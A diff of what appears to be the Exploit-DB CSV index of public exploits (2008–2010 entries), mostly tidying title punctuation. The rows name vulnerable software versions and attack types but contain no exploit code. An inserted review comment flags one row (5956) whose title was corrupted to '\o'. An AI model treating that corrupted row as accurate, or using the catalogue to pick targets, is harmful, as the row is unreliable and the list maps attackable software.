 5562,platforms/php/webapps/5562.py,"RunCMS <= 1.6.1 - (msg_image) SQL Injection Exploit",2008-05-08,The:Paradox,php,webapps,0
 5563,platforms/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow Exploit",2008-05-08,tixxDZ,windows,remote,69
-5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0
+5564,platforms/asp/webapps/5564.txt,"Shader TV (Beta) - Multiple Remote SQL Injection Vulnerabilities",2008-05-08,U238,asp,webapps,0
 5565,platforms/php/webapps/5565.pl,"vShare Youtube Clone 2.6 - (tid) Remote SQL Injection",2008-05-08,Saime,php,webapps,0
 5566,platforms/php/webapps/5566.txt,"SazCart 1.5.1 - Multiple Remote File Inclusion Vulnerabilities",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
 5567,platforms/php/webapps/5567.txt,"Cyberfolio 7.12 - (rep) Remote File Inclusion",2008-05-08,RoMaNcYxHaCkEr,php,webapps,0
@@ -5560,7 +5560,7 @@ id,file,description,date,author,platform,type,port
 5937,platforms/php/webapps/5937.txt,"MyPHP CMS 0.3.1 - (page.php pid) Remote SQL Injection",2008-06-25,"CWH Underground",php,webapps,0
 5938,platforms/php/webapps/5938.php,"PHPmotion <= 2.0 - (update_profile.php) Remote Shell Upload Exploit",2008-06-25,EgiX,php,webapps,0
 5939,platforms/php/webapps/5939.txt,"Joomla Component netinvoice 1.2.0 SP1 SQL Injection",2008-06-25,His0k4,php,webapps,0
-5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0
+5940,platforms/php/webapps/5940.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion",2008-06-26,"CWH Underground",php,webapps,0
 5941,platforms/php/webapps/5941.txt,"polypager <= 1.0rc2 - (SQL/XSS) Multiple Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
 5942,platforms/php/webapps/5942.txt,"PHP-Fusion Mod Kroax <= 4.42 - (category) SQL Injection",2008-06-26,boom3rang,php,webapps,0
 5944,platforms/php/webapps/5944.txt,"Galmeta Post CMS 0.2 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,"CWH Underground",php,webapps,0
@@ -5574,7 +5574,7 @@ id,file,description,date,author,platform,type,port
 5952,platforms/php/webapps/5952.txt,"phpBLASTER CMS 1.0 RC1 - Multiple Local File Inclusion Vulnerabilities",2008-06-26,CraCkEr,php,webapps,0
 5954,platforms/php/webapps/5954.txt,"A+ PHP Scripts Nms Insecure Cookie Handling",2008-06-26,"Virangar Security",php,webapps,0
 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (params.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
-5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
+5956,platforms/php/webapps/5956.txt,"\o - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0
 5957,platforms/php/webapps/5957.txt,"otmanager CMS 24a - (LFI/XSS) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
 5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (blind sql/XSS) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
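Review bot: The new 5956 row replaces the product name with the literal `\o`, so the title becomes `"\o - Local File Inclusion (1st)"` and no longer names Keller Web Admin CMS at all; the removed line and the 5940 row in the @@ -5560 hunk both carry `Keller Web Admin CMS 0.94 Pro`, which suggests a substitution went wrong here rather than an intended rename. A title that starts with a backslash is also easy to mangle in downstream searches and scripts that read this index. Suggested line: `+5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (1st)",2008-06-26,StAkeR,php,webapps,0`.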
@@ -5718,7 +5718,7 @@ id,file,description,date,author,platform,type,port
 6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) Remote SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
 6103,platforms/windows/dos/6103.pl,"IntelliTamper 2.0.7 - (html parser) Remote Buffer Overflow PoC",2008-07-21,"Guido Landi",windows,dos,0
 6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
-6105,platforms/asp/webapps/6105.pl,"HRS Multi (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
+6105,platforms/asp/webapps/6105.pl,"HRS Multi - (picture_pic_bv.asp key) Blind SQL Injection Exploit",2008-07-21,Mr.SQL,asp,webapps,0
 6106,platforms/windows/local/6106.pl,"IntelliTamper 2.07 - (map file) Local Arbitrary Code Execution Exploit (Perl)",2008-07-21,"Guido Landi",windows,local,0
 6107,platforms/php/webapps/6107.txt,"Interact E-Learning System 2.4.1 - (help.php) LFI Vulnerabilities",2008-07-21,DSecRG,php,webapps,0
 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Remote Blind SQL Injection Exploit",2008-07-21,Mr.SQL,cgi,webapps,0
@@ -6402,7 +6402,7 @@ id,file,description,date,author,platform,type,port
 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - (LIST) Remote Denial of Service Exploit",2008-10-24,"Alfons Luja",windows,dos,0
 6835,platforms/php/webapps/6835.txt,"BuzzyWall 1.3.1 - (download id) Remote File Disclosure",2008-10-24,b3hz4d,php,webapps,0
 6836,platforms/php/webapps/6836.txt,"Tlnews 2.2 Insecure Cookie Handling",2008-10-25,x0r,php,webapps,0
-6837,platforms/php/webapps/6837.txt,"Kasra CMS (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0
+6837,platforms/php/webapps/6837.txt,"Kasra CMS - (index.php) Multiple SQL Injection Vulnerabilities",2008-10-25,G4N0K,php,webapps,0
 6838,platforms/windows/dos/6838.rb,"PumpKIN TFTP Server 2.7.2.0 - Denial of Service Exploit (Metasploit)",2008-10-25,"Saint Patrick",windows,dos,0
 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - (gotourl.php id) SQL Injection",2008-10-26,"Hussin X",php,webapps,0
 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0
@@ -7984,7 +7984,7 @@ id,file,description,date,author,platform,type,port
 8475,platforms/php/webapps/8475.txt,"Online Guestbook Pro (display) Blind SQL Injection",2009-04-17,"Hussin X",php,webapps,0
 8476,platforms/php/webapps/8476.txt,"Online Email Manager Insecure Cookie Handling",2009-04-17,"Hussin X",php,webapps,0
 8477,platforms/php/webapps/8477.txt,"Hot Project 7.0 - (Auth Bypass) SQL Injection",2009-04-17,HCOCA_MAN,php,webapps,0
-8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - < UDEV 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
+8478,platforms/linux/local/8478.sh,"Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Local Privilege Escalation Exploit (1)",2009-04-20,kingcope,linux,local,0
 8479,platforms/windows/dos/8479.html,"Microsoft Internet Explorer EMBED Memory Corruption PoC (MS09-014)",2009-04-20,Skylined,windows,dos,0
 8480,platforms/php/webapps/8480.txt,"multi-lingual e-commerce system 0.2 - Multiple Vulnerabilities",2009-04-20,"Salvatore Fresta",php,webapps,0
 8481,platforms/php/webapps/8481.txt,"Studio Lounge Address Book 2.5 - (profile) Shell Upload",2009-04-20,JosS,php,webapps,0
@@ -8061,7 +8061,7 @@ id,file,description,date,author,platform,type,port
 8553,platforms/php/webapps/8553.htm,"Teraway LinkTracker 1.0 - Remote Password Change Exploit",2009-04-27,"ThE g0bL!N",php,webapps,0
 8554,platforms/windows/remote/8554.py,"Belkin Bulldog Plus HTTP Server Remote Buffer Overflow Exploit",2009-04-27,His0k4,windows,remote,80
 8555,platforms/php/webapps/8555.txt,"ABC Advertise 1.0 Admin Password Disclosure",2009-04-27,SirGod,php,webapps,0
-8556,platforms/linux/remote/8556.c,"Linux Kernel 2.6.x (<= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10) (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
+8556,platforms/linux/remote/8556.c,"Linux Kernel <= 2.6.20 / <= 2.6.24 / <= 2.6.27_7-10 (Ubuntu 7.04/8.04/8.10 / Fedora Core 10 / OpenSuse 11.1) - SCTP FWD Memory Corruption Remote Exploit",2009-04-28,sgrakkyu,linux,remote,0
 8557,platforms/php/webapps/8557.htm,"VisionLms 1.0 - (changePW.php) Remote Password Change Exploit",2009-04-28,Mr.tro0oqy,php,webapps,0
 8558,platforms/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injection Vulnerabilities",2009-04-28,YEnH4ckEr,php,webapps,0
 8559,platforms/php/webapps/8559.c,"webSPELL <= 4.2.0d - Local File Disclosure Exploit (.c Linux)",2009-04-28,StAkeR,php,webapps,0
@@ -8252,7 +8252,7 @@ id,file,description,date,author,platform,type,port
 8750,platforms/php/webapps/8750.txt,"PHP Article Publisher Arbitrary Auth Bypass",2009-05-20,"ThE g0bL!N",php,webapps,0
 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 - (forumid) Remote Blind SQL Injection",2009-05-20,snakespc,php,webapps,0
 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0
-8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0
+8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (2)",2009-05-20,"Landon Fuller",osx,remote,0
 8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 - (Auth Bypass) SQL Injection",2009-05-21,Striker7,php,webapps,0
 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0
@@ -8268,7 +8268,7 @@ id,file,description,date,author,platform,type,port
 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection",2009-05-22,Qabandi,php,webapps,0
 8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
-8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
+8771,platforms/php/webapps/8771.htm,"ZaoCMS - (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
 8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
 8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) - Arbitrary Remote File Upload",2009-05-22,Qabandi,php,webapps,0
 8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0
@@ -8290,7 +8290,7 @@ id,file,description,date,author,platform,type,port
 8790,platforms/php/webapps/8790.pl,"cpCommerce 1.2.x - GLOBALS[prefix] Arbitrary File Inclusion Exploit",2009-05-26,StAkeR,php,webapps,0
 8791,platforms/php/webapps/8791.txt,"WordPress Plugin Lytebox - (wp-lytebox) Local File Inclusion",2009-05-26,TurkGuvenligi,php,webapps,0
 8792,platforms/php/webapps/8792.txt,"Webradev Download Protect 1.0 - Remote File Inclusion Vulnerabilities",2009-05-26,asL-Sabia,php,webapps,0
-8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0
+8793,platforms/php/webapps/8793.txt,"eZoneScripts Hotornot2 Script - (Admin Bypass) Multiple Remote Vulnerabilities",2009-05-26,"sniper code",php,webapps,0
 8794,platforms/multiple/dos/8794.htm,"Mozilla Firefox (unclamped loop) Denial of Service Exploit",2009-05-26,"Thierry Zoller",multiple,dos,0
 8795,platforms/php/webapps/8795.htm,"Ultimate Media Script 2.0 - Remote Change Content Vulnerabilities",2009-05-26,"ThE g0bL!N",php,webapps,0
 8796,platforms/php/webapps/8796.htm,"Gallarific (user.php) Arbirary Change Admin Information Exploit",2009-05-26,TiGeR-Dz,php,webapps,0
@@ -8701,7 +8701,7 @@ id,file,description,date,author,platform,type,port
 9223,platforms/windows/local/9223.txt,"Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation Exploit",2009-07-21,"Jeremy Brown",windows,local,0
 9224,platforms/windows/remote/9224.py,"Microsoft Office Web Components Spreadsheet ActiveX (OWC10/11) Exploit",2009-07-21,"Ahmed Obied",windows,remote,0
 9225,platforms/php/webapps/9225.txt,"AnotherPHPBook (APB) 1.3.0 (Auth Bypass) - SQL Injection",2009-07-21,n3w7u,php,webapps,0
-9226,platforms/php/webapps/9226.txt,"phpdirectorysource (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
+9226,platforms/php/webapps/9226.txt,"phpdirectorysource - (XSS/SQL) Multiple Vulnerabilities",2009-07-21,Moudi,php,webapps,0
 9227,platforms/php/webapps/9227.txt,"Meta Search Engine Script - (url) Local File Disclosure",2009-07-21,Moudi,php,webapps,0
 9228,platforms/windows/dos/9228.pl,"otsAV 1.77.001 - (.ofl) Local Heap Overflow PoC",2009-07-22,hack4love,windows,dos,0
 9229,platforms/windows/local/9229.py,"WINMOD 1.4 - (.lst) Universal Buffer Overflow Exploit (SEH) (2)",2009-07-22,Dz_Girl,windows,local,0
@@ -8715,7 +8715,7 @@ id,file,description,date,author,platform,type,port
 9240,platforms/windows/dos/9240.py,"OpenH323 Opal SIP Protocol Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0
 9241,platforms/windows/dos/9241.py,"Ekiga 2.0.5 - (GetHostAddress) Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0
 9242,platforms/windows/dos/9242.py,"WzdFTPD <= 8.0 - Remote Denial of Service Exploit",2009-07-24,"Jose Miguel Esparza",windows,dos,0
-9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
+9243,platforms/php/webapps/9243.txt,"Million-Dollar Pixel Ads Platinum - (SQL/XSS) Multiple Vulnerabilities",2009-07-24,Moudi,php,webapps,0
 9244,platforms/php/webapps/9244.txt,"Joomla Extension UIajaxIM 1.1 JavaScript Execution",2009-07-24,"599eme Man",php,webapps,0
 9245,platforms/php/webapps/9245.pl,"PHP Live! 3.2.1/2 - (x) Remote Blind SQL Injection Exploit",2009-07-24,skys,php,webapps,0
 9246,platforms/php/webapps/9246.txt,"Basilic 1.5.13 - (index.php idAuthor) SQL Injection",2009-07-24,NoGe,php,webapps,0
@@ -8734,7 +8734,7 @@ id,file,description,date,author,platform,type,port
 9259,platforms/php/webapps/9259.txt,"almond classifieds ads - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
 9260,platforms/php/webapps/9260.txt,"skadate dating - (RFI/LFI/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
 9261,platforms/php/webapps/9261.txt,"xoops celepar module qas - (bSQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
-9262,platforms/php/webapps/9262.txt,"garagesalesjunkie (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
+9262,platforms/php/webapps/9262.txt,"garagesalesjunkie - (SQL/XSS) Multiple Vulnerabilities",2009-07-27,Moudi,php,webapps,0
 9263,platforms/php/webapps/9263.txt,"URA 3.0 - (cat) Remote SQL Injection",2009-07-27,"Chip d3 bi0s",php,webapps,0
 9264,platforms/linux/dos/9264.py,"stftp <= 1.10 - (PWD Response) Remote Stack Overflow PoC",2009-07-27,sqlevil,linux,dos,0
 9265,platforms/linux/dos/9265.c,"ISC DHCP dhclient < 3.1.2p1 - Remote Buffer Overflow PoC",2009-07-27,"Jon Oberheide",linux,dos,0
@@ -8809,7 +8809,7 @@ id,file,description,date,author,platform,type,port
 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - (Auth Bypass) SQL Injection",2009-08-03,SirGod,php,webapps,0
 9337,platforms/php/webapps/9337.txt,"simplePHPWeb 0.2 - (files.php) Authentication Bypass",2009-08-03,SirGod,php,webapps,0
-9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher (bSQL-XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
+9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0
 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) Remote SQL Injection",2009-08-03,snakespc,php,webapps,0
@@ -8848,7 +8848,7 @@ id,file,description,date,author,platform,type,port
 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0
 9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0
 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0
-9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
+9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0
 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow Exploit (seh)",2009-08-06,germaya_x,windows,local,0
 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0
 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - (.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0
@@ -8940,10 +8940,10 @@ id,file,description,date,author,platform,type,port
 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0
 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0
 9476,platforms/windows/local/9476.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0
-9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - sock_sendpage() Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
+9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0
 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80
 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0
-9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
+9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0
 9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - (.psh) Universal BoF Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0
@@ -9007,7 +9007,7 @@ id,file,description,date,author,platform,type,port
 9542,platforms/linux/local/9542.c,"Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - ip_append_data() ring0 Root Exploit (1)",2009-08-31,"INetCop Security",linux,local,0
 9543,platforms/linux/local/9543.c,"Linux Kernel < 2.6.31-rc7 - AF_IRDA 29-Byte Stack Disclosure Exploit (2)",2009-08-31,"Jon Oberheide",linux,local,0
 9544,platforms/php/webapps/9544.txt,"Modern Script <= 5.0 - (index.php s) SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0
-9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - sock_sendpage() Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
+9545,platforms/linux/local/9545.c,"Linux Kernel 2.4.x / 2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SUSE 10 SP2/11 / Ubuntu 8.10) - 'sock_sendpage()' Local Root (PPC)",2009-08-31,"Ramon Valle",linux,local,0
 9546,platforms/windows/dos/9546.pl,"Swift Ultralite 1.032 - (.M3U) Local Buffer Overflow PoC",2009-08-31,hack4love,windows,dos,0
 9547,platforms/windows/dos/9547.pl,"SolarWinds TFTP Server <= 9.2.0.111 - Remote DoS Exploit",2009-08-31,"Gaurav Baruah",windows,dos,0
 9548,platforms/windows/local/9548.pl,"Ultimate Player 1.56b (.m3u/upl) Universal Local BoF Exploit (SEH)",2009-08-31,hack4love,windows,local,0
@@ -10600,7 +10600,7 @@ id,file,description,date,author,platform,type,port
 11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 - Local File Include",2010-02-27,"cr4wl3r ",php,webapps,0
 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 - SQL Injection",2010-02-27,"cr4wl3r ",php,webapps,0
 11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 - Multiple File Include",2010-02-27,"cr4wl3r ",php,webapps,0
-11588,platforms/php/webapps/11588.txt,"phpMySite (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0
+11588,platforms/php/webapps/11588.txt,"phpMySite - (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0
 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection",2010-02-27,Crux,asp,webapps,0
 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 - Denial of Service Exploit",2010-02-27,Ale46,multiple,dos,0
 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection",2010-02-27,Crux,php,webapps,0
@@ -10653,7 +10653,7 @@ id,file,description,date,author,platform,type,port
 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0
 11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php (id) SQL Injection",2010-03-07,"Easy Laster",php,webapps,0
 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi - Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0
-11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit 1.6.x / 1.7.x (<= 1.6.9p21 / <= 1.7.2p4) - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
+11651,platforms/multiple/local/11651.sh,"(Tod Miller's) Sudo/SudoEdit <= 1.6.9p21 / <= 1.7.2p4 - Local Root Exploit",2010-03-07,kingcope,multiple,local,0
 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0
 11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus 'V4.rgo' (id) news.php - SQL Injection",2010-03-08,"Easy Laster",php,webapps,0
 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 - Local File Include",2010-03-08,"cr4wl3r ",php,webapps,0
@@ -10774,7 +10774,7 @@ id,file,description,date,author,platform,type,port
 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0
 11781,platforms/php/webapps/11781.html,"chilly_CMS CSRF",2010-03-17,"pratul agrawal",php,webapps,0
 11782,platforms/php/webapps/11782.txt,"Joomla Component com_include SQL Injection",2010-03-17,"DevilZ TM",php,webapps,0
-11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0
+11783,platforms/php/webapps/11783.txt,"Preisschlacht Multi Liveshop System - SQL Injection (seite&aid) index.php",2010-03-17,"Easy Laster",php,webapps,0
 11784,platforms/php/webapps/11784.txt,"PostNuke FormExpress Module Blind SQL Injection",2010-03-17,"Ali Abbasi",php,webapps,0
 11785,platforms/php/webapps/11785.txt,"Joomla Component com_ckforms - Multiple Vulnerabilities",2010-03-17,"ALTBTA ",php,webapps,0
 11786,platforms/windows/local/11786.txt,"Virtual PC Hypervisor Memory Protection",2010-03-17,"Core Security",windows,local,0
@@ -10795,7 +10795,7 @@ id,file,description,date,author,platform,type,port
 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0
 11806,platforms/php/webapps/11806.txt,"nensor CMS 2.01 - Multiple Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0
 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 - Multiple Remote File Include Vulnerabilities",2010-03-18,"cr4wl3r ",php,webapps,0
-11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
+11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed - (SQL/XSS) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0
 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 - Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21
 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 - Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21
 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0
@@ -10877,7 +10877,7 @@ id,file,description,date,author,platform,type,port
 11899,platforms/php/webapps/11899.html,"AdaptCMS_Lite_1.5 2009-07-07",2010-03-27,ITSecTeam,php,webapps,0
 11900,platforms/windows/local/11900.pl,"Mini-stream RM-MP3 Converter 3.0.0.7 - (.pls) Universal Stack BoF",2010-03-27,mat,windows,local,0
 11902,platforms/php/webapps/11902.txt,"MyOWNspace 8.2 - Multi Local File Include",2010-03-27,ITSecTeam,php,webapps,0
-11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 multi file include",2010-03-27,ITSecTeam,php,webapps,0
+11903,platforms/php/webapps/11903.txt,"Open Web Analytics 1.2.3 - multi file include",2010-03-27,ITSecTeam,php,webapps,0
 11904,platforms/php/webapps/11904.txt,"68kb multi Remote file include",2010-03-27,ITSecTeam,php,webapps,0
 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum (SMF) <= 1.1.8 - (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0
 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 - Multiple Vulnerabilities",2010-03-27,"cp77fk4r ",php,webapps,0
@@ -11365,7 +11365,7 @@ id,file,description,date,author,platform,type,port
